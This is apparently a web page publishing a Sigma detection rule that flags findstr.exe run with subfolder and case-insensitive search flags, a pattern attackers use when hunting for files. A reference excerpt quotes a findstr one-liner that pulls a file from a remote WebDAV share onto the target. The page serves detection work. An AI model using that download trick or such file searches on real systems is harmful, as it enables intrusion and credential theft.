Insensitive Subfolder Search Via Findstr.EXE
Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
Sigma rule (View on GitHub)
1title: Insensitive Subfolder Search Via Findstr.EXE
2id: 04936b66-3915-43ad-a8e5-809eadfd1141
3related:
4 - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
5 type: obsoletes
6status: experimental
7description: |
8 Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
9references:
10 - https://lolbas-project.github.io/lolbas/Binaries/Findstr/
11 - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
12 - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
13author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
14date: 2020/10/05
15modified: 2024/03/05
16tags:
17 - attack.defense_evasion
18 - attack.t1218
19 - attack.t1564.004
20 - attack.t1552.001
21 - attack.t1105
22logsource:
23 category: process_creation
24 product: windows
25detection:
26 selection_findstr:
27 - CommandLine|contains: findstr
28 - Image|endswith: 'findstr.exe'
29 - OriginalFileName: 'FINDSTR.EXE'
30 selection_cli_search_subfolder:
31 CommandLine|contains|windash: ' -s '
32 selection_cli_search_insensitive:
33 CommandLine|contains|windash: ' -i '
34 condition: selection_findstr and all of selection_cli_search_*
35falsepositives:
36 - Administrative or software activity
37level: low
References
-
Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe Use c...
Read More -
I wrote a blogpost a while back about Alternate data streams that you can find here: After I wrote that post I have made some new discoveries that I wanted to share around Alternate data streams. …
Read More -
Related rules
- Remote File Download Via Findstr.EXE
- Curl Download And Execute Combination
- Import LDAP Data Interchange Format File Via Ldifde.EXE
- File Download Via Windows Defender MpCmpRun.EXE
- PrintBrm ZIP Creation of Extraction